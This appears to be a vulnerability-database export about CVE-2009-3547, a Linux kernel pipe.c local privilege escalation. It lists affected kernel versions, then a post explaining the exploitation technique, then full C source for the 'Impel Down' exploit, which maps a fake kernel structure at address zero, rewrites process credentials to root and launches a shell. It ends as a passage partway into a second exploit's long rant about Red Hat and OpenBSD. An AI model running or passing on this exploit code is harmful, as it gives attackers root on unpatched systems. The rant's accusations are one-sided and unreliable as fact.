-rc7\r\nLinux kernel 2.6.31 -rc6\r\nLinux kernel 2.6.31 -rc3\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.31 -rc1\r\nLinux kernel 2.6.31 \r\nLinux kernel 2.6.30 rc6\r\nLinux kernel 2.6.30 1\r\nLinux kernel 2.6.30 -rc5\r\nLinux kernel 2.6.30 -rc3\r\nLinux kernel 2.6.30 -rc2\r\nLinux kernel 2.6.30 -rc1\r\nLinux kernel 2.6.30 \r\nLinux kernel 2.6.29 4\r\nLinux kernel 2.6.29 1\r\nLinux kernel 2.6.29 -git8\r\nLinux kernel 2.6.29 -git14\r\nLinux kernel 2.6.29 -git1\r\nLinux kernel 2.6.29 \r\nLinux kernel 2.6.28 9\r\nLinux kernel 2.6.28 8\r\nLinux kernel 2.6.28 6\r\nLinux kernel 2.6.28 5\r\nLinux kernel 2.6.28 3\r\nLinux kernel 2.6.28 2\r\nLinux kernel 2.6.28 1\r\nLinux kernel 2.6.28 -rc7\r\nLinux kernel 2.6.28 -rc5\r\nLinux kernel 2.6.28 -rc1\r\nLinux kernel 2.6.28 -git7\r\nLinux kernel 2.6.28 \r\nLinux kernel 2.6.27 6\r\nLinux kernel 2.6.27 3\r\nLinux kernel 2.6.27 24\r\nLinux kernel 2.6.27 14\r\nLinux kernel 2.6.27 13\r\nLinux kernel 2.6.27 12\r\nLinux kernel 2.6.27 12\r\nLinux kernel 2.6.27 .8\r\nLinux kernel 2.6.27 .5\r\nLinux kernel 2.6.27 .5\r\nLinux kernel 2.6.27 -rc8-git5\r\nLinux kernel 2.6.27 -rc8\r\nLinux kernel 2.6.27 -rc6-git6\r\nLinux kernel 2.6.27 -rc6\r\nLinux kernel 2.6.27 -rc5\r\nLinux kernel 2.6.27 -rc2\r\nLinux kernel 2.6.27 -rc1\r\nLinux kernel 2.6.27 \r\nLinux kernel 2.6.26 7\r\nLinux kernel 2.6.26 4\r\nLinux kernel 2.6.26 3\r\nLinux kernel 2.6.26 .6\r\nLinux kernel 2.6.26 -rc6\r\nLinux kernel 2.6.26 \r\nLinux kernel 2.6.25 19\r\nLinux kernel 2.6.25 .9\r\nLinux kernel 2.6.25 .8\r\nLinux kernel 2.6.25 .7\r\nLinux kernel 2.6.25 .6\r\nLinux kernel 2.6.25 .5\r\nLinux kernel 2.6.25 .15\r\nLinux kernel 2.6.25 .13\r\nLinux kernel 2.6.25 .12\r\nLinux kernel 2.6.25 .11\r\nLinux kernel 2.6.25 .10\r\nLinux kernel 2.6.25 \r\nLinux kernel 2.6.25 \r\nLinux kernel 2.6.24 .2\r\nLinux kernel 2.6.24 .1\r\nLinux kernel 2.6.24 -rc5\r\nLinux kernel 2.6.24 -rc4\r\nLinux kernel 2.6.24 -rc3\r\nLinux kernel 2.6.24 -git13\r\nLinux kernel 2.6.24 \r\nLinux kernel 2.6.23 .7\r\nLinux kernel 2.6.23 .6\r\nLinux kernel 2.6.23 .5\r\nLinux kernel 2.6.23 .4\r\nLinux kernel 2.6.23 .3\r\nLinux kernel 2.6.23 .2\r\nLinux kernel 2.6.23 -rc2\r\nLinux kernel 2.6.23 -rc1\r\nLinux kernel 2.6.23 \r\nLinux kernel 2.6.22 7\r\nLinux kernel 2.6.22 1\r\nLinux kernel 2.6.22 .8\r\nLinux kernel 2.6.22 .6\r\nLinux kernel 2.6.22 .5\r\nLinux kernel 2.6.22 .4\r\nLinux kernel 2.6.22 .3\r\nLinux kernel 2.6.22 .17\r\nLinux kernel 2.6.22 .16\r\nLinux kernel 2.6.22 .15\r\nLinux kernel 2.6.22 .14\r\nLinux kernel 2.6.22 .13\r\nLinux kernel 2.6.22 .12\r\nLinux kernel 2.6.22 .11\r\nLinux kernel 2.6.22 \r\nLinux kernel 2.6.22 \r\nLinux kernel 2.6.21 4\r\nLinux kernel 2.6.21 .7\r\nLinux kernel 2.6.21 .6\r\nLinux kernel 2.6.21 .2\r\nLinux kernel 2.6.21 .1\r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.20 .9\r\nLinux kernel 2.6.20 .8\r\nLinux kernel 2.6.20 .5\r\nLinux kernel 2.6.20 .4\r\nLinux kernel 2.6.20 .15\r\nLinux kernel 2.6.20 -git5\r\nLinux kernel 2.6.20 \r\nLinux kernel 2.6.20 \r\nLinux kernel 2.6.19 1\r\nLinux kernel 2.6.19 .2\r\nLinux kernel 2.6.19 .1\r\nLinux kernel 2.6.19 -rc4\r\nLinux kernel 2.6.19 -rc3\r\nLinux kernel 2.6.19 -rc2\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.19 -rc1\r\nLinux kernel 2.6.19 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.18 .4\r\nLinux kernel 2.6.18 .3\r\nLinux kernel 2.6.18 .1\r\nLinux kernel 2.6.18 \r\nLinux kernel 2.6.17 .8\r\nLinux kernel 2.6.17 .7\r\nLinux kernel 2.6.17 .6\r\nLinux kernel 2.6.17 .5\r\nLinux kernel 2.6.17 .3\r\nLinux kernel 2.6.17 .2\r\nLinux kernel 2.6.17 .14\r\nLinux kernel 2.6.17 .13\r\nLinux kernel 2.6.17 .12\r\nLinux kernel 2.6.17 .11\r\nLinux kernel 2.6.17 .10\r\nLinux kernel 2.6.17 .1\r\nLinux kernel 2.6.17 -rc5\r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.16 27\r\nLinux kernel 2.6.16 13\r\nLinux kernel 2.6.16 .9\r\nLinux kernel 2.6.16 .7\r\nLinux kernel 2.6.16 .23\r\nLinux kernel 2.6.16 .19\r\nLinux kernel 2.6.16 .12\r\nLinux kernel 2.6.16 .11\r\nLinux kernel 2.6.16 .1\r\nLinux kernel 2.6.16 -rc1\r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.15 .4\r\nLinux kernel 2.6.15 .3\r\nLinux kernel 2.6.15 .2\r\nLinux kernel 2.6.15 .1\r\nLinux kernel 2.6.15 -rc3\r\nLinux kernel 2.6.15 -rc2\r\nLinux kernel 2.6.15 -rc1\r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.14 .5\r\nLinux kernel 2.6.14 .4\r\nLinux kernel 2.6.14 .3\r\nLinux kernel 2.6.14 .2\r\nLinux kernel 2.6.14 .1\r\nLinux kernel 2.6.14 -rc4\r\nLinux kernel 2.6.14 -rc3\r\nLinux kernel 2.6.14 -rc2\r\nLinux kernel 2.6.14 -rc1\r\nLinux kernel 2.6.14 \r\nLinux kernel 2.6.14 \r\nLinux kernel 2.6.13 .4\r\nLinux kernel 2.6.13 .3\r\nLinux kernel 2.6.13 .2\r\nLinux kernel 2.6.13 .1\r\nLinux kernel 2.6.13 -rc7\r\nLinux kernel 2.6.13 -rc6\r\nLinux kernel 2.6.13 -rc4\r\nLinux kernel 2.6.13 -rc1\r\nLinux kernel 2.6.13 \r\nLinux kernel 2.6.13 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.12 .6\r\nLinux kernel 2.6.12 .5\r\nLinux kernel 2.6.12 .4\r\nLinux kernel 2.6.12 .3\r\nLinux kernel 2.6.12 .22\r\nLinux kernel 2.6.12 .2\r\nLinux kernel 2.6.12 .12\r\nLinux kernel 2.6.12 .1\r\nLinux kernel 2.6.12 -rc5\r\nLinux kernel 2.6.12 -rc4\r\nLinux kernel 2.6.12 -rc1\r\nLinux kernel 2.6.12 \r\nLinux kernel 2.6.12 \r\nLinux kernel 2.6.11 .8\r\nLinux kernel 2.6.11 .7\r\nLinux kernel 2.6.11 .6\r\nLinux kernel 2.6.11 .5\r\nLinux kernel 2.6.11 .4\r\nLinux kernel 2.6.11 .12\r\nLinux kernel 2.6.11 .11\r\nLinux kernel 2.6.11 -rc4\r\nLinux kernel 2.6.11 -rc3\r\nLinux kernel 2.6.11 -rc2\r\nLinux kernel 2.6.11 \r\nLinux kernel 2.6.11 \r\nLinux kernel 2.6.10 rc2\r\nLinux kernel 2.6.10 \r\nLinux kernel 2.6.10 \r\nLinux kernel 2.6.9 \r\nLinux kernel 2.6.8 rc3\r\nLinux kernel 2.6.8 rc2\r\nLinux kernel 2.6.8 rc1\r\n+ Ubuntu Ubuntu Linux 4.1 ppc\r\n+ Ubuntu Ubuntu Linux 4.1 ia64\r\n+ Ubuntu Ubuntu Linux 4.1 ia32\r\nLinux kernel 2.6.8 \r\nLinux kernel 2.6.7 rc1\r\nLinux kernel 2.6.7 \r\nLinux kernel 2.6.6 rc1\r\nLinux kernel 2.6.6 \r\nLinux kernel 2.6.5 \r\nLinux kernel 2.6.4 \r\nLinux kernel 2.6.3 \r\nLinux kernel 2.6.2 \r\nLinux kernel 2.6.1 -rc2\r\nLinux kernel 2.6.1 -rc1\r\nLinux kernel 2.6.1 \r\nLinux kernel 2.6 .10\r\nLinux kernel 2.6 -test9-CVS\r\nLinux kernel 2.6 -test9\r\nLinux kernel 2.6 -test8\r\nLinux kernel 2.6 -test7\r\nLinux kernel 2.6 -test6\r\nLinux kernel 2.6 -test5\r\nLinux kernel 2.6 -test4\r\nLinux kernel 2.6 -test3\r\nLinux kernel 2.6 -test2\r\nLinux kernel 2.6 -test11\r\nLinux kernel 2.6 -test10\r\nLinux kernel 2.6 -test1\r\nLinux kernel 2.6 \r\nLinux kernel 2.6.8.1\r\n+ S.u.S.E. Linux Personal 9.2 x86_64\r\n+ S.u.S.E. Linux Personal 9.2 \r\n+ Ubuntu Ubuntu Linux 4.1 ppc\r\n+ Ubuntu Ubuntu Linux 4.1 ia64\r\n+ Ubuntu Ubuntu Linux 4.1 ia32\r\nLinux kernel 2.6.32-rc5\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.32-rc4\r\nLinux kernel 2.6.32-rc3\r\nLinux kernel 2.6.32-rc2\r\nLinux kernel 2.6.32-rc1\r\nLinux kernel 2.6.31.4\r\nLinux kernel 2.6.31.2\r\nLinux kernel 2.6.31-rc9\r\nLinux kernel 2.6.31-rc8\r\nLinux kernel 2.6.31-rc7\r\nLinux kernel 2.6.31-rc5-git3\r\nLinux kernel 2.6.31-rc2\r\nLinux kernel 2.6.31-git11\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.30.5\r\nLinux kernel 2.6.30.4\r\nLinux kernel 2.6.30.3\r\nLinux kernel 2.6.29-rc2-git1\r\nLinux kernel 2.6.29-rc2\r\nLinux kernel 2.6.29-rc1\r\nLinux kernel 2.6.28.4\r\nLinux kernel 2.6.26.1\r\nLinux kernel 2.6.26-rc5-git1\r\nLinux kernel 2.6.25.4\r\nLinux kernel 2.6.25.3\r\nLinux kernel 2.6.25.2\r\nLinux kernel 2.6.25.1\r\nLinux kernel 2.6.25-rc1\r\nLinux kernel 2.6.24.6\r\nLinux kernel 2.6.24-rc2\r\nLinux kernel 2.6.24-rc1\r\nLinux kernel 2.6.23.14\r\nLinux kernel 2.6.23.10\r\nLinux kernel 2.6.23.1\r\nLinux kernel 2.6.23.09\r\nLinux kernel 2.6.22-rc7\r\nLinux kernel 2.6.22-rc1\r\nLinux kernel 2.6.21-RC6\r\nLinux kernel 2.6.21-RC5\r\nLinux kernel 2.6.21-RC4\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.20.3\r\nLinux kernel 2.6.20.2\r\nLinux kernel 2.6.20.13\r\nLinux kernel 2.6.20.11\r\nLinux kernel 2.6.20.1\r\nLinux kernel 2.6.20-rc2\r\nLinux kernel 2.6.20-2\r\nLinux kernel 2.6.19 -rc6\r\nLinux kernel 2.6.18-8.1.8.el5\r\nLinux kernel 2.6.18-53\r\nLinux kernel 2.6.18\r\nLinux kernel 2.6.15.5\r\nLinux kernel 2.6.15.11\r\nLinux kernel 2.6.15-27.48\r\nLinux kernel 2.6.11.4\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u8865\u4e01\u7a0b\u5e8f\uff1a\r\nhttp://lkml.org/lkml/2009/10/21/42", "modified": "2009-11-05T00:00:00", "published": "2009-11-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12576", "id": "SSV:12576", "type": "seebug", "title": "Linux\u5185\u6838'pipe.c'\u672c\u5730\u7279\u6743\u63d0\u5347\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:31:49", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-11-08T00:00:00", "published": "2009-11-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12593", "id": "SSV:12593", "title": "Linux 2.6.x fs/pipe.c local root exploit", "type": "seebug", "sourceData": "\n For those who were not yet aware, there is at least 3 public exploits \r\nsince 11/05/2009 for CVE-2009-3547 targeting *all* linux kernels from \r\n2.6.0 to 2.6.31 included. Since spender and fotis have already release \r\ntheir own, there is not need for us to keep this on our hd. \r\nImpelDown.c is a poc trying to exploit null ptr dereference in fs/pipe.c \r\nfor *all* linux kernel from 2.6.0 to 2.6.31 and ImpelDown-2.6.31only.c \r\ntarget only linux kernel version 2.6.31 (tested and approuved with \r\nmmap_min_addr at 0). \r\nIf you were writing your own, you have already noticed that there is a \r\nsubtle difference in the way you can own kernels 2.6.0 up to 2.6.10 and \r\nkernels 2.6.11 up to 2.6.31: in the first one the null ptr deref leads \r\nto an arbitrary write to everywhere in the kernel since you have control \r\nover the destination address of \r\n\r\nlinux2.6.9/fs/pipe.c \r\n\r\n... \r\n219 if (pipe_iov_copy_from_user(pipebuf, iov, chars)) { \r\n... \r\nIn such case, we try to exploit this by overwriting and old and obsolete \r\nsyscall address in the sys_call_table by our privilege escalator function \r\naddress (hehe old school trickz are always the best). \r\n\r\nIn kernels 2.6.11 up to 2.6.31, exploitation simply resume in mapping the correct \r\nstruct pipe_inode_info at NULL and the kernel will call a fptr under our control \r\nat inode-&gt;i_pipe-&gt;bufs[1-16].ops-&gt;something() \r\n\r\nYou can find exploits at \r\nhttp://www.vxhell.org/~teach/exploits/ImpelDown.c \r\nand \r\nhttp://www.vxhell.org/~teach/exploits/ImpelDown-2.6.31only.c \r\nThe first one wasn't tested but the second would work for the given kernel \r\n(according to your mmap_min_addr) \r\n\r\nWe highly recommand to apply grsecurity patch ([1]) since UDEREF will preserve \r\nyou from all this bug class, \r\nor at least have a kernel which correctly implement mmap_min_addr, but \r\nJulien and Tavis [2] have already showed you how this can be easily bypassed. \r\nRegards \r\n\r\n[1] http://grsecurity.net \r\n[2] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html \r\n\r\n\r\nteach[at]blackpearl$ head -n 18 exploits/ImpelDown-2.6.31only.c \r\n/****************************************************************************** \r\n* .:: Impel Down ::. \r\n* \r\n* Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86) \r\n* by teach &amp; xipe \r\n* Greetz goes to all our mates from #nibbles, #oldschool and \r\n#carib0u \r\n* (hehe guyz, we would probably be high profile and mediatised el8 \r\nif we \r\n* lost less time on trolling all day long, but we LOVE IT :))) \r\n* Special thanks to Ivanlef0u, j0rn &amp; pouik for being such amazing \r\n(but i \r\n* promise ivan, one day i'll kill u :p) \r\n* \r\n* (C) COPYRIGHT teach &amp; xipe, 2009 \r\n* All Rights Reserved \r\n* \r\n* teach[at]vxhell.org \r\n* xipe[at]vxhell.org \r\n* \r\n\r\n*******************************************************************************/ \n ", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12593"}], "exploitdb": [{"lastseen": "2016-02-03T18:56:48", "bulletinFamily": "exploit", "description": "Linux Kernel 2.6.x pipe.c Local Privilege Escalation Vulnerability (2). CVE-2009-3547. Local exploit for linux platform", "modified": "2009-11-03T00:00:00", "published": "2009-11-03T00:00:00", "id": "EDB-ID:33322", "href": "https://www.exploit-db.com/exploits/33322/", "type": "exploitdb", "title": "Linux Kernel 2.6.x - pipe.c Local Privilege Escalation Vulnerability 2", "sourceData": "source: http://www.securityfocus.com/bid/36901/info\r\n \r\nLinux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference.\r\n \r\nLocal attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.\r\n\r\n/******************************************************************************\r\n * .:: Impel Down ::.\r\n *\r\n * Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86)\r\n * by teach & xipe\r\n * Greetz goes to all our mates from #nibbles, #oldschool and #carib0u\r\n * (hehe guyz, we would probably be high profile and mediatised el8 if we \r\n * lost less time on trolling all day long, but we LOVE IT :))) \r\n * Special thanks to Ivanlef0u, j0rn & pouik for being such amazing (but i\r\n * promise ivan, one day i'll kill u :p)\r\n * \r\n * (C) COPYRIGHT teach & xipe, 2009\r\n * All Rights Reserved\r\n *\r\n * teach@vxhell.org\r\n * xipe@vxhell.org\r\n * \r\n *******************************************************************************/\r\n\r\n#include <fcntl.h>\r\n#include <sys/mman.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <sys/mman.h>\r\n#include <syscall.h>\r\n#include <stdint.h>\r\n\r\n#define PIPE_BUFFERS (16)\r\n\r\nstruct pipe_buf_operations {\r\n int can_merge;\r\n\tint *ops[10];\r\n};\r\n\r\nstruct pipe_buffer {\r\n int *page;\r\n unsigned int offset, len;\r\n const struct pipe_buf_operations *ops;\r\n unsigned int flags;\r\n unsigned long private;\r\n};\r\n\r\nstruct pseudo_pipe_inode_info\r\n{\r\n\t/* Wait queue head */\r\n \t\t/* spinlock */\r\n\t\tint spinlock;\r\n\t\t/* list */\r\n\t\tint *next, *prev;\r\n\tunsigned int nrbufs, curbuf;\r\n\tint *page;\r\n\tunsigned int readers;\r\n\tunsigned int writers;\r\n\tunsigned int waiting_writers;\r\n\tunsigned int r_counter;\r\n\tunsigned int w_counter;\r\n\tint *async_readers;\r\n\tint *async_writers;\r\n\tint *inode;\r\n\tstruct pipe_buffer bufs[PIPE_BUFFERS];\r\n};\r\n\r\nstatic pid_t uid;\r\nstatic gid_t gid;\r\nunsigned long taskstruct[1024];\r\n\r\nstatic inline void *get_stack_top()\r\n{\r\n\tvoid *stack;\r\n\r\n\t__asm__ __volatile__ (\r\n\t\"movl $0xffffe000,%%eax ;\"\r\n\t\"andl %%esp, %%eax ;\"\r\n\t\"movl %%eax, %0 ;\"\r\n\t: \"=r\" (stack)\r\n\t);\r\n\treturn stack; \r\n}\r\n\r\nstatic inline void *get_current()\r\n{\r\n\treturn *(void **)get_stack_top();\r\n}\r\n\r\nstatic void update_cred()\r\n{\r\n\tuint32_t\ti;\r\n\tuint32_t\t*task = get_current(); /* Pointer to the task_struct */\r\n\tuint32_t \t*cred = 0;\r\n\t\r\n\tfor (i = 0; i < 1024; i++)\r\n\t{\r\n\t\ttaskstruct[i] = task[i];\r\n\t\tcred = (uint32_t *)task[i];\r\n\t\tif (cred == (uint32_t *)task[i+1] && cred > (uint32_t *)0xc0000000) {\r\n\t\t\tcred++; /* Get ride of the cred's 'usage' field */\r\n\t \tif (cred[0] == uid && cred[1] == gid\r\n\t\t && cred[2] == uid && cred[3] == gid\r\n\t\t && cred[4] == uid && cred[5] == gid\r\n\t\t && cred[6] == uid && cred[7] == gid)\r\n\t\t {\r\n\t\t\t\t/* Get root */\r\n\t\t \tcred[0] = cred[2] = cred[4] = cred[6] = 0;\r\n\t\t cred[1] = cred[3] = cred[5] = cred[7] = 0;\r\n\t\t\t\tbreak;\r\n\t\t }\r\n\t\t}\r\n\t}\r\n}\r\n\r\nint is_done(int new)\r\n{\r\n\tstatic int done = 0;\r\n\tif (done == 1)\r\n\t\treturn (1);\r\n\tdone = new;\r\n}\r\n\r\nvolatile int done = 0;\r\nvoid\tkernel_code()\r\n{\r\n\tis_done(1);\r\n\tupdate_cred();\r\n\t//exit_kernel();\r\n}\r\n\r\nint main(int ac, char **av)\r\n{\r\n\tint fd[2];\r\n\tint pid;\r\n\tint parent_pid = getpid();\r\n\tchar *buf;\r\n\tint i,j;\r\n\tstruct pseudo_pipe_inode_info \t*pinfo = 0;\r\n\tstruct pipe_buf_operations\tops;\t\r\n\r\n\tbuf = mmap(0, 0x1000, PROT_READ | PROT_EXEC | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, 0, 0); \r\n\r\n\tprintf (\"buf: %p\\n\", buf);\r\n\r\n\tpinfo->readers = 0;\r\n\tpinfo->writers = 0;\r\n\r\n\tfor (i = 0; i < 10; i++)\r\n\t\tops.ops[i] = (int *)kernel_code;\r\n\r\n\tfor (i = 0; i < PIPE_BUFFERS; i++)\r\n\t{\r\n\t\tpinfo->bufs[i].ops = &ops;\r\n\t}\r\n\r\n\ti = 0;\r\n\r\n\r\n\tuid = getuid();\r\n\tgid = getgid();\r\n\tsetresuid(uid, uid, uid);\r\n\tsetresgid(gid, gid, gid);\r\n\t//while (1) \r\n\t{\r\n\t\tpid = fork();\r\n\t\tif (pid == -1)\r\n\t\t{\r\n\t\t\tperror(\"fork\");\r\n\t\t\treturn (-1);\r\n\t\t}\r\n\t\tif (pid)\r\n\t\t{\r\n\t\t\tchar path[1024];\r\n\t\t\tchar c;\r\n\t\t\t/* I assume next opened fd will be 4 */\r\n\t\t\tsprintf(path, \"/proc/%d/fd/4\", pid);\r\n\t\t printf(\"Parent: %d\\nChild: %d\\n\", parent_pid, pid);\t\r\n\t\t\twhile (!is_done(0))\r\n\t\t\t{\r\n\t\t\t\tfd[0] = open(path, O_RDWR);\r\n\t\t\t\tif (fd[0] != -1)\r\n\t\t\t\t{\r\n\t\t\t\t\tclose(fd[0]);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t//system(\"/bin/sh\");\r\n\t\t\texecl(\"/bin/sh\", \"/bin/sh\", \"-i\", NULL);\r\n\t\t\treturn (0);\r\n\t\t}\r\n\t\r\n\t\twhile (!is_done(0))\r\n\t\t{\r\n\t\t\tif (pipe(fd) != -1)\r\n\t\t\t{\r\n\t\t\t\tclose(fd[0]);\r\n\t\t\t\tclose(fd[1]);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\r\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33322/"}, {"lastseen": "2018-11-30T12:32:58", "bulletinFamily": "exploit", "description": "", "modified": "2013-12-16T00:00:00", "published": "2013-12-16T00:00:00", "id": "EDB-ID:40812", "href": "https://www.exploit-db.com/exploits/40812", "type": "exploitdb", "title": "Linux Kernel 2.6.10 &lt; 2.6.31.5 - &#039;pipe.c&#039; Local Privilege Escalation", "sourceData": "/* exp_moosecox.c\r\n Watch a video of the exploit here:\r\n http://www.youtube.com/watch?v=jt81NvaOj5Y\r\n\r\n developed entirely by Ingo Molnar (exploit writer extraordinaire!) , \r\n thanks to Fotis Loukos for pointing the bug out to me -- neat bug! :)\r\n\r\n dedicated to the Red Hat employees who get paid to copy+paste my \r\n twitter and issue security advisories, their sweet \r\n acknowledgement policy, and general classiness\r\n see: https://bugzilla.redhat.com/show_activity.cgi?id=530490\r\n\r\n \"policy\" aside, there's a word for what you guys are doing: \"plagiarism\"\r\n in fact, i tested this one day by posting three links to twitter,\r\n without any discussion on any of them. the same day, those three\r\n (and only those three) links were assigned CVEs, even though two of \r\n them weren't even security bugs (it doesn't pay to copy+paste)\r\n\r\n official Ingo Molnar (that's me) policy for acknowledgement in \r\n exploits requires general douche-ness or plagiarization\r\n official policy further dictates immediate exploit release for\r\n embargoed, patched bug\r\n\r\n I'll be curious to see what the CVE statistics are like for the \r\n kernel this year when they get compiled next year -- I'm predicting \r\n that when someone's watching the sleepy watchers, a more personal \r\n interest is taken in doing the job that you're paid to do correctly.\r\n\r\n --------------------------------------------------------------------\r\n\r\n Special PS note to Theo (I can do this here because I know he'll \r\n never read it -- the guy is apparently oblivious to the entire world of \r\n security around him -- the same world that invents the protections \r\n years before him that he pats himself on the back for \"innovating\")\r\n Seriously though, it's incredible to me that an entire team \r\n of developers whose sole purpose is to develop a secure operating \r\n system can be so oblivious to the rest of the world. They haven't \r\n innovated since they replaced exploitable string copies with \r\n exploitable string truncations 6 or so years ago.\r\n\r\n The entire joke of a thread can be read here:\r\n http://www.pubbs.net/openbsd/200911/4582/\r\n \"Our focus therefore is always on finding innovative ideas which make \r\n bugs very hard to exploit succesfully.\"\r\n \"He's too busy watching monkey porn instead of\r\n building researching last-year's security technology that will stop \r\n an exploit technique that has been exploited multiple times.\"\r\n \"it seems that everyone else is slowly coming around to the\r\n same solution.\"\r\n\r\n So let's talk about this \"innovation\" of theirs with their \r\n implementation of mmap_min_addr:\r\n\r\n They implemented it in 2008, a year after Linux implemented it, a \r\n year after the public phrack article on the bug class, more than a \r\n year after my mail to dailydave with the first public Linux kernel \r\n exploit for the bug class, and over two years after UDEREF was \r\n implemented in PaX (providing complete protection against the smaller \r\n subset of null ptr dereference bugs and the larger class of invalid \r\n userland access in general).\r\n\r\n OpenBSD had a public null pointer dereference exploit (agp_ioctl()) \r\n published for its OS in January of 2007. It took them over a year \r\n and a half to implement the same feature that was implemented in \r\n Linux a few months after my public exploit in 2007.\r\n\r\n So how can it be that \"everyone else is slowly coming around to the \r\n same solution\" when \"everyone else\" came to that solution over a \r\n year before you Theo? In fact, I prediced this exact situation would \r\n happen back in 2007 in my DD post:\r\n http://lists.virus.org/dailydave-0703/msg00011.html\r\n \"Expect OpenBSD to independently invent a protection against null ptr \r\n deref bugs sometime in 2009.\"\r\n\r\n Let's talk about some more \"innovation\" -- position independent \r\n executables. PaX implemented position independent executables on \r\n Linux back in 2001 (ET_DYN). PIE binary support was added to GNU \r\n binutils in 2003. Those OpenBSD innovators implemented PIE binaries \r\n in 2008, 7 years after PaX. Innovation indeed!\r\n\r\n How about their W^X/ASLR innovation? These plagiarists have the \r\n audacity to announce on their press page:\r\n http://www.openbsd.org/press.html\r\n \"Microsoft borrows one of OpenBSD's security features for Vista, \r\n stack/library randomization, under the name Address Space Layout \r\n Randomization (ASLR). \"Until now, the feature has been most \r\n prominently used in the OpenBSD Unix variant and the PaX and Exec \r\n Shield security patches for Linux\"\"\r\n Borrowing one of your features? Where'd this ASLR acronym come from \r\n anyway? Oh that's right, PaX again -- when they published the first \r\n design and implementation of it, and coined the term, in July 2001.\r\n It covered the heap, mmap, and stack areas.\r\n OpenBSD implemented \"stack-gap randomization\" in 2003. Way to \r\n innovate!\r\n\r\n W^X, which is a horrible name as OpenBSD doesn't even enforce it with \r\n mprotect restrictions like PaX did from the beginning or even SELinux \r\n is doing now (from a 3rd party contribution modeled after PaX): \r\n PaX implemented true per-page non-executable page support, protecting \r\n binary data, the heap, and the stack, back in 2000.\r\n OpenBSD implemented it in 2003, requiring a full userland rebuild.\r\n The innovation is overwhelming!\r\n\r\n They keep coming up with the same exact \"innovations\" others came up \r\n with years before them. Their official explanation for where they \r\n got the W^X/ASLR ideas was a drunk guy came into their tent at one of \r\n their hack-a-thons and started talking about the idea. They had \r\n never heard of PaX when we asked them in 2003. Which makes the \r\n following involuntarily contributed private ICB logs from Phrack #66\r\n (Internet Citizen's Band -- OpenBSD internal chat network) so intriguing:\r\n\r\n On some sunny day in July 2002 (t: Theo de Raadt):\r\n <cloder> why can't you just randomize the base\r\n <cloder> that's what PaX does\r\n <t> You've not been paying attention to what art's saying, or you don't \r\n understand yet, either case is one of think it through yourself.\r\n <cloder> whatever\r\n\r\n Only to see poetic justice in August 2003 (ttt: Theo again):\r\n\r\n <miod> more exactly, we heard of pax when they started bitching\r\n <ttt> miod, that was very well 